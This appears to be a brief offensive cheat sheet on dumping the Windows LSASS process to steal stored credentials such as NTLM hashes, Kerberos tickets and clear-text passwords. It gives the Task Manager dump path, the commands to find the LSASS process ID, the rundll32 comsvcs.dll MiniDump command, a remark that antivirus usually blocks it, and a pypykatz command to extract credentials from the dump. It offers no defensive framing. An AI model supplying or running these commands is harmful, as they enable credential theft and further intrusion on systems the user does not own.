LSASS

LSASS (Local Security Authority Subsystem Service)

What LSASS Stores

• NTLM Hashes

• Kerberos tickets

• WDigest clear-text creds

• DPAPI masterkeys

• SHA1 hashes

1

🧩 Dumping LSASS Memory

🖥️ 1. GUI Method (Task Manager)

Path:

Task Manager → Processes → Local Security Authority Process → Right-click → Create dump file

Output saved at:

%temp%\lsass.DMP

2

Command-line Method (rundll32 + comsvcs.dll)

⚠️ Most AV blocks this, but core technique:

🔎 Find LSASS PID

CMD:

tasklist /svc

PS:

Get-Process lsass

🧱 Create dump file

rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full

3

🧪 Extract Credentials (Offline)

pypykatz lsa minidump /path/to/lsass.dmp